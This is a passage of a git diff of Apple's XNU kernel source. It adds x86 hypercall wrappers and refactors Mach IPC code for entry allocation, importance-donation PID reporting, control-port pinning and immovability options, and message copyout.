+ */ + +typedef struct hvg_hcall_output_regs { + uint64_t rax; + uint64_t rdi; + uint64_t rsi; + uint64_t rdx; + uint64_t rcx; + uint64_t r8; + uint64_t r9; +} hvg_hcall_output_regs_t; + +/* + * To avoid collision with other hypercall interfaces (e.g., KVM) in the vmcall + * namespace, Apple hypercalls put "A" (0x41) in the top byte of %eax so that + * hypervisors can support multiple hypercall interfaces simultaneously and + * handle Apple hypercalls correctly for compatibility. + * + * For example, KVM uses the same vmcall instruction and has call code 1 for + * KVM_HC_VAPIC_POLL_IRQ. When invoking an Apple hypercall with code 1, a + * hypervisor will not accidentally treat the Apple hypercall as a KVM call. + */ + +#define HVG_HCALL_CODE(code) ('A' << 24 | (code & 0xFFFFFF)) + + +/* + * Caller is responsible for checking the existence of Apple Hypercall + * before invoking Apple hypercalls. + */ + +#define HVG_HCALL_RETURN(rax) {\ + __asm__ __volatile__ goto (\ + "jnc 2f \n\t" \ + "jmp %l0 \n\t" \ + "2: \n\t" \ + : /* no output */ \ + : /* no input */ \ + : /* no clobber */ \ + : error);\ + return HVG_HCALL_SUCCESS;\ +error:\ + return (hvg_hcall_return_t)rax;\ +} + +static inline hvg_hcall_return_t +hvg_hypercall6(uint64_t code, uint64_t rdi, uint64_t rsi, uint64_t rdx, uint64_t rcx, uint64_t r8, uint64_t r9, + hvg_hcall_output_regs_t *output) +{ + __asm__ __volatile__ ("movq %12, %%r8 \n\t" + "movq %13, %%r9 \n\t" + "vmcall \n\t" + "movq %%r8, %5 \n\t" + "movq %%r9, %6 \n\t" + : "=a" (output->rax), /* %0: output[0] */ + "=D" (output->rdi), /* %1: output[1] */ + "=S" (output->rsi), /* %2: output[2] */ + "=d" (output->rdx), /* %3: output[3] */ + "=c" (output->rcx), /* %4: output[4] */ + "=r" (output->r8), /* %5: output[5] */ + "=r" (output->r9) /* %6: output[6] */ + : "a" (HVG_HCALL_CODE(code)),/* %7: call code */ + "D" (rdi), /* %8: arg[0] */ + "S" (rsi), /* %9: arg[1] */ + "d" (rdx), /* %10: arg[2] */ + "c" (rcx), /* %11: arg[3] */ + "r" (r8), /* %12: arg[4] */ 
+ "r" (r9) /* %13: arg[5] */ + : "memory", "r8", "r9"); + HVG_HCALL_RETURN(output->rax); +} + +static inline hvg_hcall_return_t +hvg_hypercall0(const uint64_t code, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, 0, 0, 0, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall1(const uint64_t code, + const uint64_t rdi, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, 0, 0, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall2(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, 0, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall3(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, rdx, 0, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall4(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, rdx, rcx, 0, 0, output); +} + +static inline hvg_hcall_return_t +hvg_hypercall5(const uint64_t code, + const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx, const uint64_t r8, + hvg_hcall_output_regs_t *output) +{ + return hvg_hypercall6(code, rdi, rsi, rdx, rcx, r8, 0, output); +} + +#endif /* DEBUG || DEVELOPMENT */ + +#endif /* _I386_X86_HYPERCALL_H_ */ diff --git a/osfmk/ipc/ipc_entry.c b/osfmk/ipc/ipc_entry.c index e05803973..4195a3aca 100644 --- a/osfmk/ipc/ipc_entry.c +++ b/osfmk/ipc/ipc_entry.c @@ -223,34 +223,6 @@ ipc_entry_claim( return KERN_SUCCESS; } -/* - * Routine: ipc_entry_get - * Purpose: - * Tries to allocate an entry out of the space. - * Conditions: - * The space is write-locked and active throughout. - * An object may be locked. Will not allocate memory. 
- * Returns: - * KERN_SUCCESS A free entry was found. - * KERN_NO_SPACE No entry allocated. - */ - -kern_return_t -ipc_entry_get( - ipc_space_t space, - mach_port_name_t *namep, - ipc_entry_t *entryp) -{ - kern_return_t kr; - - kr = ipc_entries_hold(space, 1); - if (KERN_SUCCESS != kr) { - return kr; - } - - return ipc_entry_claim(space, namep, entryp); -} - /* * Routine: ipc_entry_alloc * Purpose: @@ -281,9 +253,9 @@ ipc_entry_alloc( return KERN_INVALID_TASK; } - kr = ipc_entry_get(space, namep, entryp); + kr = ipc_entries_hold(space, 1); if (kr == KERN_SUCCESS) { - return kr; + return ipc_entry_claim(space, namep, entryp); } kr = ipc_entry_grow_table(space, ITS_SIZE_NONE); @@ -409,7 +381,6 @@ ipc_entry_alloc_name( */ kern_return_t kr; kr = ipc_entry_grow_table(space, index + 1); - assert(kr != KERN_NO_SPACE); if (kr != KERN_SUCCESS) { /* space is unlocked */ return kr; diff --git a/osfmk/ipc/ipc_entry.h b/osfmk/ipc/ipc_entry.h index 5601b84c8..781cc5c1c 100644 --- a/osfmk/ipc/ipc_entry.h +++ b/osfmk/ipc/ipc_entry.h @@ -235,12 +235,6 @@ extern kern_return_t ipc_entry_claim( mach_port_name_t *namep, ipc_entry_t *entryp); -/* Allocate an entry in a space */ -extern kern_return_t ipc_entry_get( - ipc_space_t space, - mach_port_name_t *namep, - ipc_entry_t *entryp); - /* Allocate an entry in a space, growing the space if necessary */ extern kern_return_t ipc_entry_alloc( ipc_space_t space, diff --git a/osfmk/ipc/ipc_eventlink.c b/osfmk/ipc/ipc_eventlink.c index 87a31f784..7e461457f 100644 --- a/osfmk/ipc/ipc_eventlink.c +++ b/osfmk/ipc/ipc_eventlink.c @@ -1009,7 +1009,7 @@ convert_port_to_eventlink_locked( if (ip_active(port) && ip_kotype(port) == IKOT_EVENTLINK) { - ipc_eventlink = (struct ipc_eventlink *)port->ip_kobject; + ipc_eventlink = (struct ipc_eventlink *)ipc_kobject_get(port); if (ipc_eventlink) { ipc_eventlink_reference(ipc_eventlink); diff --git a/osfmk/ipc/ipc_importance.c b/osfmk/ipc/ipc_importance.c index bc3980f2d..2c76a7281 100644 --- 
a/osfmk/ipc/ipc_importance.c +++ b/osfmk/ipc/ipc_importance.c @@ -1997,6 +1997,16 @@ task_importance_update_owner_info(task_t task) } #endif +static int +task_importance_task_get_pid(ipc_importance_task_t iit) +{ +#if DEVELOPMENT || DEBUG + return (int)iit->iit_bsd_pid; +#else + return task_pid(iit->iit_task); +#endif +} + /* * Routine: ipc_importance_reset_locked * Purpose: @@ -2034,13 +2044,6 @@ ipc_importance_reset_locked(ipc_importance_task_t task_imp, boolean_t donor) task_imp->iit_legacy_externdrop = 0; after_donor = ipc_importance_task_is_donor(task_imp); -#if DEVELOPMENT || DEBUG - if (task_imp->iit_assertcnt > 0 && task_imp->iit_live_donor) { - printf("Live donor task %s[%d] still has %d importance assertions after reset\n", - task_imp->iit_procname, task_imp->iit_bsd_pid, task_imp->iit_assertcnt); - } -#endif - /* propagate a downstream drop if there was a change in donor status */ if (after_donor != before_donor) { ipc_importance_task_propagate_assertion_locked(task_imp, IIT_UPDATE_DROP, FALSE); @@ -3260,7 +3263,8 @@ ipc_importance_receive( * will trigger the probe in ipc_importance_task_externalize_assertion() * above and have impresult==1 here. 
*/ - DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self), int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt); + DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self), + int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt); } #endif /* IMPORTANCE_TRACE */ } @@ -3587,59 +3591,61 @@ ipc_importance_extract_content( mach_voucher_attr_content_t out_content, mach_voucher_attr_content_size_t *in_out_content_size) { - mach_voucher_attr_content_size_t size = 0; ipc_importance_elem_t elem; unsigned int i; + char *buf = (char *)out_content; + mach_voucher_attr_content_size_t size = *in_out_content_size; + mach_voucher_attr_content_size_t pos = 0; + __unused int pid; + IMPORTANCE_ASSERT_MANAGER(manager); IMPORTANCE_ASSERT_KEY(key); /* the first non-default value provides the data */ - for (i = 0; i < value_count && *in_out_content_size > 0; i++) { + for (i = 0; i < value_count; i++) { elem = (ipc_importance_elem_t)values[i]; if (IIE_NULL == elem) { continue; } - snprintf((char *)out_content, *in_out_content_size, "Importance for pid "); - size = (mach_voucher_attr_content_size_t)strlen((char *)out_content); + pos += scnprintf(buf + pos, size - pos, "Importance for "); for (;;) { ipc_importance_inherit_t inherit = III_NULL; ipc_importance_task_t task_imp; - task_t task; - int t_pid; if (IIE_TYPE_TASK == IIE_TYPE(elem)) { task_imp = (ipc_importance_task_t)elem; - task = task_imp->iit_task; - t_pid = (TASK_NULL != task) ? - task_pid(task) : -1; - snprintf((char *)out_content + size, *in_out_content_size - size, "%d", t_pid); } else { inherit = (ipc_importance_inherit_t)elem; task_imp = inherit->iii_to_task; - task = task_imp->iit_task; - t_pid = (TASK_NULL != task) ? - task_pid(task) : -1; - snprintf((char *)out_content + size, *in_out_content_size - size, - "%d (%d of %d boosts) %s from pid ", t_pid, - III_EXTERN(inherit), inherit->iii_externcnt, - (inherit->iii_donating) ? 
"donated" : "linked"); } - - size = (mach_voucher_attr_content_size_t)strlen((char *)out_content); +#if DEVELOPMENT || DEBUG + pos += scnprintf(buf + pos, size - pos, "%s[%d]", + task_imp->iit_procname, task_imp->iit_bsd_pid); +#else + ipc_importance_lock(); + pid = task_importance_task_get_pid(task_imp); + ipc_importance_unlock(); + pos += scnprintf(buf + pos, size - pos, "pid %d", pid); +#endif /* DEVELOPMENT || DEBUG */ if (III_NULL == inherit) { break; } - + pos += scnprintf(buf + pos, size - pos, + " (%d of %d boosts) %s from ", + III_EXTERN(inherit), inherit->iii_externcnt, + (inherit->iii_donating) ? "donated" : "linked"); elem = inherit->iii_from_elem; } - size++; /* account for NULL */ + + pos++; /* account for terminating \0 */ + break; } *out_command = MACH_VOUCHER_ATTR_NOOP; /* cannot be used to regenerate value */ - *in_out_content_size = size; + *in_out_content_size = pos; return KERN_SUCCESS; } @@ -3863,14 +3869,7 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m target_pid = -1; if (temp_inherit->iii_donating) { -#if DEVELOPMENT || DEBUG - target_pid = temp_inherit->iii_to_task->iit_bsd_pid; -#else - temp_task = temp_inherit->iii_to_task->iit_task; - if (temp_task != TASK_NULL) { - target_pid = task_pid(temp_task); - } -#endif + target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task); } if (target_pid != -1 && previous_pid != target_pid) { @@ -3898,19 +3897,12 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m continue; } - if (IIE_TYPE_TASK == IIE_TYPE(elem) && - (((ipc_importance_task_t)elem)->iit_task != TASK_NULL)) { - target_pid = task_pid(((ipc_importance_task_t)elem)->iit_task); + if (IIE_TYPE_TASK == IIE_TYPE(elem)) { + ipc_importance_task_t temp_iit = (ipc_importance_task_t)elem; + target_pid = task_importance_task_get_pid(temp_iit); } else { temp_inherit = (ipc_importance_inherit_t)elem; -#if DEVELOPMENT || DEBUG - target_pid = 
temp_inherit->iii_to_task->iit_bsd_pid; -#else - temp_task = temp_inherit->iii_to_task->iit_task; - if (temp_task != TASK_NULL) { - target_pid = task_pid(temp_task); - } -#endif + target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task); } if (target_pid != -1 && previous_pid != target_pid) { diff --git a/osfmk/ipc/ipc_init.c b/osfmk/ipc/ipc_init.c index b6ff1fc9e..b2a97a89c 100644 --- a/osfmk/ipc/ipc_init.c +++ b/osfmk/ipc/ipc_init.c @@ -110,7 +110,7 @@ #include /* NDR_record */ -#define IPC_KERNEL_MAP_SIZE (1024 * 1024) +#define IPC_KERNEL_MAP_SIZE (CONFIG_IPC_KERNEL_MAP_SIZE * 1024 * 1024) SECURITY_READ_ONLY_LATE(vm_map_t) ipc_kernel_map; /* values to limit physical copy out-of-line memory descriptors */ @@ -125,6 +125,19 @@ const vm_size_t ipc_kmsg_max_vm_space = ((IPC_KERNEL_COPY_MAP_SIZE * 7) / 8); #define IPC_KMSG_MAX_SPACE (64 * 1024 * 1024) /* keep in sync with COPYSIZELIMIT_PANIC */ const vm_size_t ipc_kmsg_max_body_space = ((IPC_KMSG_MAX_SPACE * 3) / 4 - MAX_TRAILER_SIZE); +#if XNU_TARGET_OS_OSX +#define IPC_CONTROL_PORT_OPTIONS_DEFAULT IPC_CONTROL_PORT_OPTIONS_NONE +#else +#define IPC_CONTROL_PORT_OPTIONS_DEFAULT (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD | IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT) +#endif + +TUNABLE(ipc_control_port_options_t, ipc_control_port_options, + "ipc_control_port_options", IPC_CONTROL_PORT_OPTIONS_DEFAULT); + +SECURITY_READ_ONLY_LATE(bool) pinned_control_port_enabled; +SECURITY_READ_ONLY_LATE(bool) immovable_control_port_enabled; + + LCK_GRP_DECLARE(ipc_lck_grp, "ipc"); LCK_ATTR_DECLARE(ipc_lck_attr, 0, 0); @@ -163,6 +176,15 @@ ipc_init(void) arcade_init(); #endif + pinned_control_port_enabled = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD)); + immovable_control_port_enabled = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT | IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD)); + + if (pinned_control_port_enabled && 
!immovable_control_port_enabled) { + kprintf("Invalid ipc_control_port_options boot-arg: pinned control port cannot be enabled without immovability enforcement. Ignoring pinning boot-arg."); + pinned_control_port_enabled = false; + ipc_control_port_options &= ~(IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD); + } + kr = kmem_suballoc(kernel_map, &min, IPC_KERNEL_MAP_SIZE, TRUE, (VM_FLAGS_ANYWHERE), diff --git a/osfmk/ipc/ipc_kmsg.c b/osfmk/ipc/ipc_kmsg.c index 04ec259aa..8b219581d 100644 --- a/osfmk/ipc/ipc_kmsg.c +++ b/osfmk/ipc/ipc_kmsg.c @@ -90,7 +90,6 @@ #include #include #include -#include #include #include #include @@ -2619,7 +2618,7 @@ ipc_kmsg_allow_immovable_send( * rights in the message body to succeed */ if (IO_VALID(object) && io_is_kobject(object)) { - kmsg->ikm_flags |= IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND; + kmsg->ikm_flags |= IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND; } } @@ -2992,7 +2991,7 @@ ipc_kmsg_copyin_header( */ if (reply_entry != IE_NULL) { kr = ipc_right_copyin(space, reply_name, reply_entry, - reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK, + reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK, &reply_port, &reply_soright, &release_port, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -3093,8 +3092,8 @@ ipc_kmsg_copyin_header( * copyin the destination. 
*/ kr = ipc_right_copyin(space, dest_name, dest_entry, - dest_type, (IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND | - IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE), + dest_type, (IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND | + IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE), &dest_port, &dest_soright, &release_port, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -3110,7 +3109,7 @@ ipc_kmsg_copyin_header( */ if (MACH_PORT_VALID(reply_name)) { kr = ipc_right_copyin(space, reply_name, reply_entry, - reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK, + reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK, &reply_port, &reply_soright, &release_port, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -3127,7 +3126,7 @@ ipc_kmsg_copyin_header( */ if (IE_NULL != voucher_entry) { kr = ipc_right_copyin(space, voucher_name, voucher_entry, - voucher_type, IPC_RIGHT_COPYIN_FLAGS_NONE, + voucher_type, IPC_OBJECT_COPYIN_FLAGS_NONE, (ipc_object_t *)&voucher_port, &voucher_soright, &voucher_release_port, @@ -4605,6 +4604,7 @@ ipc_kmsg_copyout_header( uint32_t entries_held = 0; boolean_t need_write_lock = FALSE; + ipc_object_copyout_flags_t reply_copyout_options = IPC_OBJECT_COPYOUT_FLAGS_NONE; kern_return_t kr; /* @@ -4625,6 +4625,7 @@ ipc_kmsg_copyout_header( } if (need_write_lock) { +handle_reply_again: is_write_lock(space); while (entries_held) { @@ -4649,32 +4650,48 @@ ipc_kmsg_copyout_header( /* Handle reply port. */ if (IP_VALID(reply)) { + ipc_port_t reply_subst = IP_NULL; ipc_entry_t entry; + ip_lock(reply); + + /* Is the reply port still active and allowed to be copied out? 
*/ + if (!ip_active(reply) || + !ip_label_check(space, reply, reply_type, + &reply_copyout_options, &reply_subst)) { + /* clear the context value */ + reply->ip_reply_context = 0; + ip_unlock(reply); + + assert(reply_subst == IP_NULL); + release_reply_port = reply; + reply = IP_DEAD; + reply_name = MACH_PORT_DEAD; + goto done_with_reply; + } + + /* is the kolabel requesting a substitution */ + if (reply_subst != IP_NULL) { + /* + * port is unlocked, its right consumed + * space is unlocked + */ + assert(reply_type == MACH_MSG_TYPE_PORT_SEND); + msg->msgh_local_port = reply = reply_subst; + goto handle_reply_again; + } + + /* Is there already an entry we can use? */ if ((reply_type != MACH_MSG_TYPE_PORT_SEND_ONCE) && ipc_right_reverse(space, ip_to_object(reply), &reply_name, &entry)) { - /* reply port is locked and active */ assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); } else { - ip_lock(reply); - /* Is the reply port still active and allowed to be copied out? */ - if (!ip_active(reply) || !ip_label_check(space, reply, reply_type)) { - /* clear the context value */ - reply->ip_reply_context = 0; - ip_unlock(reply); - - release_reply_port = reply; - reply = IP_DEAD; - reply_name = MACH_PORT_DEAD; - goto done_with_reply; - } - /* claim a held entry for the reply port */ assert(entries_held > 0); entries_held--; ipc_entry_claim(space, &reply_name, &entry); - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); + assert(!ipc_right_inuse(entry)); assert(entry->ie_object == IO_NULL); entry->ie_object = ip_to_object(reply); } @@ -4711,7 +4728,8 @@ ipc_kmsg_copyout_header( } kr = ipc_right_copyout(space, reply_name, entry, - reply_type, NULL, NULL, ip_to_object(reply)); + reply_type, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, + ip_to_object(reply)); assert(kr == KERN_SUCCESS); /* reply port is unlocked */ } else { @@ -4738,25 +4756,25 @@ done_with_reply: if ((option & MACH_RCV_VOUCHER) != 0) { ipc_entry_t entry; + ip_lock(voucher); + if 
(ipc_right_reverse(space, ip_to_object(voucher), &voucher_name, &entry)) { - /* voucher port locked */ assert(entry->ie_bits & MACH_PORT_TYPE_SEND); } else { assert(entries_held > 0); entries_held--; ipc_entry_claim(space, &voucher_name, &entry); - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); + assert(!ipc_right_inuse(entry)); assert(entry->ie_object == IO_NULL); entry->ie_object = ip_to_object(voucher); - ip_lock(voucher); } /* space is locked and active */ - require_ip_active(voucher); + assert(ip_kotype(voucher) == IKOT_VOUCHER); kr = ipc_right_copyout(space, voucher_name, entry, - MACH_MSG_TYPE_MOVE_SEND, NULL, NULL, - ip_to_object(voucher)); + MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, + NULL, NULL, ip_to_object(voucher)); /* voucher port is unlocked */ } else { voucher_type = MACH_MSGH_BITS_ZERO; @@ -4931,8 +4949,7 @@ done_with_voucher: * MACH_MSG_IPC_KERNEL Kernel resource shortage. * (Name is MACH_PORT_NULL.) */ - -mach_msg_return_t +static mach_msg_return_t ipc_kmsg_copyout_object( ipc_space_t space, ipc_object_t object, @@ -4948,10 +4965,9 @@ ipc_kmsg_copyout_object( return MACH_MSG_SUCCESS; } - kr = ipc_object_copyout(space, object, msgt_name, context, guard_flags, namep); + kr = ipc_object_copyout(space, object, msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE, + context, guard_flags, namep); if (kr != KERN_SUCCESS) { - ipc_object_destroy(object, msgt_name); - if (kr == KERN_INVALID_CAPABILITY) { *namep = MACH_PORT_DEAD; } else { @@ -4969,14 +4985,15 @@ ipc_kmsg_copyout_object( } static mach_msg_descriptor_t * -ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc, - mach_msg_descriptor_t *dest_dsc, - ipc_space_t space, - kern_return_t *mr) +ipc_kmsg_copyout_port_descriptor( + mach_msg_descriptor_t *dsc, + mach_msg_descriptor_t *dest_dsc, + ipc_space_t space, + kern_return_t *mr) { - mach_port_t port; - mach_port_name_t name; - mach_msg_type_name_t disp; + mach_port_t port; + mach_port_name_t name; + mach_msg_type_name_t disp; 
/* Copyout port right carried in the message */ port = dsc->port.name; @@ -5005,17 +5022,20 @@ ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc, return (mach_msg_descriptor_t *)dest_dsc; } -mach_msg_descriptor_t * -ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr); -mach_msg_descriptor_t * -ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr) +static mach_msg_descriptor_t * +ipc_kmsg_copyout_ool_descriptor( + mach_msg_ool_descriptor_t *dsc, + mach_msg_descriptor_t *user_dsc, + int is_64bit, + vm_map_t map, + mach_msg_return_t *mr) { - vm_map_copy_t copy; - vm_map_address_t rcv_addr; - mach_msg_copy_options_t copy_options; - vm_map_size_t size; + vm_map_copy_t copy; + vm_map_address_t rcv_addr; + mach_msg_copy_options_t copy_options; + vm_map_size_t size; mach_msg_descriptor_type_t dsc_type; - boolean_t misaligned = FALSE; + boolean_t misaligned = FALSE; //SKIP_PORT_DESCRIPTORS(saddr, sdsc_count); @@ -5441,20 +5461,24 @@ ipc_kmsg_copyout_body( for (i = dsc_count - 1; i >= 0; i--) { switch (kern_dsc[i].type.type) { case MACH_MSG_PORT_DESCRIPTOR: - user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i], user_dsc, space, &mr); + user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i], + user_dsc, space, &mr); break; case MACH_MSG_OOL_VOLATILE_DESCRIPTOR: case MACH_MSG_OOL_DESCRIPTOR: user_dsc = ipc_kmsg_copyout_ool_descriptor( - (mach_msg_ool_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, &mr); + (mach_msg_ool_descriptor_t *)&kern_dsc[i], + user_dsc, is_task_64bit, map, &mr); break; case MACH_MSG_OOL_PORTS_DESCRIPTOR: user_dsc = ipc_kmsg_copyout_ool_ports_descriptor( - (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, space, kmsg, &mr); + (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i], + user_dsc, is_task_64bit, map, space, 
kmsg, &mr); break; case MACH_MSG_GUARDED_PORT_DESCRIPTOR: user_dsc = ipc_kmsg_copyout_guarded_port_descriptor( - (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, kmsg, space, option, &mr); + (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i], + user_dsc, is_task_64bit, kmsg, space, option, &mr); break; default: { panic("untyped IPC copyout body: invalid message descriptor"); diff --git a/osfmk/ipc/ipc_kmsg.h b/osfmk/ipc/ipc_kmsg.h index dff4370cf..fe744639f 100644 --- a/osfmk/ipc/ipc_kmsg.h +++ b/osfmk/ipc/ipc_kmsg.h @@ -82,10 +82,6 @@ #include #include -typedef uint16_t ipc_kmsg_flags_t; - -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 /* Dest port contains an immovable send right */ - #if (DEVELOPMENT || DEBUG) /* Turn on to keep partial message signatures for better debug */ #define IKM_PARTIAL_SIG 0 @@ -107,8 +103,6 @@ typedef uint16_t ipc_kmsg_flags_t; */ struct ipc_kmsg { - mach_msg_size_t ikm_size; - uint32_t ikm_ppriority; /* pthread priority of this kmsg */ struct ipc_kmsg *ikm_next; /* next message on port/discard queue */ struct ipc_kmsg *ikm_prev; /* prev message on port/discard queue */ union { @@ -123,12 +117,14 @@ struct ipc_kmsg { #if MACH_FLIPC struct mach_node *ikm_node; /* Originating node - needed for ack */ #endif + mach_msg_size_t ikm_size; + uint32_t ikm_ppriority; /* pthread priority of this kmsg */ #if IKM_PARTIAL_SIG uintptr_t ikm_header_sig; /* sig for just the header */ uintptr_t ikm_headtrail_sig;/* sif for header and trailer */ #endif uintptr_t ikm_signature; /* sig for all kernel-processed data */ - ipc_kmsg_flags_t ikm_flags; + ipc_object_copyin_flags_t ikm_flags; mach_msg_qos_t ikm_qos_override; /* qos override on this kmsg */ mach_msg_filter_id ikm_filter_policy_id; /* Sandbox-specific policy id used for message filtering */ }; @@ -334,15 +330,6 @@ extern mach_msg_return_t ipc_kmsg_copyout_header( ipc_space_t space, mach_msg_option_t option); -/* Copyout a port right returning a name */ -extern 
mach_msg_return_t ipc_kmsg_copyout_object( - ipc_space_t space, - ipc_object_t object, - mach_msg_type_name_t msgt_name, - mach_port_context_t *context, - mach_msg_guard_flags_t *guard_flags, - mach_port_name_t *namep); - /* Copyout the header and body to a user message */ extern mach_msg_return_t ipc_kmsg_copyout( ipc_kmsg_t kmsg, diff --git a/osfmk/ipc/ipc_mqueue.c b/osfmk/ipc/ipc_mqueue.c index d715828ab..98ad438bb 100644 --- a/osfmk/ipc/ipc_mqueue.c +++ b/osfmk/ipc/ipc_mqueue.c @@ -75,7 +75,7 @@ #include #include -#include +#include #include #include #include /* XXX - for mach_msg_receive_continue */ @@ -188,7 +188,6 @@ imq_reserve_and_lock(ipc_mqueue_t mq, uint64_t *reserved_prepost) void imq_release_and_unlock(ipc_mqueue_t mq, uint64_t reserved_prepost) { - assert(imq_held(mq)); waitq_unlock(&mq->imq_wait_queue); waitq_prepost_release_reserve(reserved_prepost); } @@ -592,7 +591,6 @@ ipc_mqueue_send( if (wresult == THREAD_WAITING) { wresult = thread_block(THREAD_CONTINUE_NULL); - counter(c_ipc_mqueue_send_block++); } /* Call turnstile complete with interlock held */ @@ -678,11 +676,7 @@ ipc_mqueue_override_send( if (full_queue_empty) { ipc_port_t port = ip_from_mq(mqueue); int dst_pid = 0; - if (ip_active(port) && !port->ip_tempowner && - port->ip_receiver_name && port->ip_receiver && - port->ip_receiver != ipc_space_kernel) { - dst_pid = task_pid(port->ip_receiver->is_task); - } + dst_pid = ipc_port_get_receiver_task(port, NULL); } #endif } @@ -704,7 +698,7 @@ ipc_mqueue_release_msgcount(ipc_mqueue_t port_mq, ipc_mqueue_t set_mq) { struct turnstile *send_turnstile = port_send_turnstile(ip_from_mq(port_mq)); (void)set_mq; - assert(imq_held(port_mq)); + imq_held(port_mq); assert(port_mq->imq_msgcount > 1 || ipc_kmsg_queue_empty(&port_mq->imq_messages)); port_mq->imq_msgcount--; @@ -1037,10 +1031,6 @@ ipc_mqueue_receive( } if (wresult == THREAD_WAITING) { - counter((interruptible == THREAD_ABORTSAFE) ? 
- c_ipc_mqueue_receive_block_user++ : - c_ipc_mqueue_receive_block_kernel++); - if (self->ith_continuation) { thread_block(ipc_mqueue_receive_continue); } @@ -1488,7 +1478,7 @@ void ipc_mqueue_release_peek_ref(ipc_mqueue_t mq) { assert(!imq_is_set(mq)); - assert(imq_held(mq)); + imq_held(mq); /* * clear any preposts this mq may have generated @@ -1718,7 +1708,7 @@ ipc_mqueue_destroy_locked(ipc_mqueue_t mqueue) * Changes a message queue limit; the maximum number * of messages which may be queued. * Conditions: - * Nothing locked. + * Port is locked. */ void diff --git a/osfmk/ipc/ipc_mqueue.h b/osfmk/ipc/ipc_mqueue.h index 98ea22434..47ed2259d 100644 --- a/osfmk/ipc/ipc_mqueue.h +++ b/osfmk/ipc/ipc_mqueue.h @@ -164,7 +164,7 @@ typedef struct ipc_mqueue { #define imq_is_valid(mq) waitq_is_valid(&(mq)->imq_wait_queue) #define imq_unlock(mq) waitq_unlock(&(mq)->imq_wait_queue) -#define imq_held(mq) waitq_held(&(mq)->imq_wait_queue) +#define imq_held(mq) assert(waitq_held(&(mq)->imq_wait_queue)) #define imq_valid(mq) waitq_valid(&(mq)->imq_wait_queue) extern void imq_lock(ipc_mqueue_t mq); diff --git a/osfmk/ipc/ipc_object.c b/osfmk/ipc/ipc_object.c index 5086568f6..f65ceff40 100644 --- a/osfmk/ipc/ipc_object.c +++ b/osfmk/ipc/ipc_object.c @@ -336,7 +336,8 @@ ipc_object_alloc_dead_name( } /* space is write-locked */ - if (ipc_right_inuse(space, name, entry)) { + if (ipc_right_inuse(entry)) { + is_write_unlock(space); return KERN_NAME_EXISTS; } @@ -382,21 +383,11 @@ ipc_object_alloc( assert(type != MACH_PORT_TYPE_NONE); assert(urefs <= MACH_PORT_UREFS_MAX); - object = io_alloc(otype); + object = 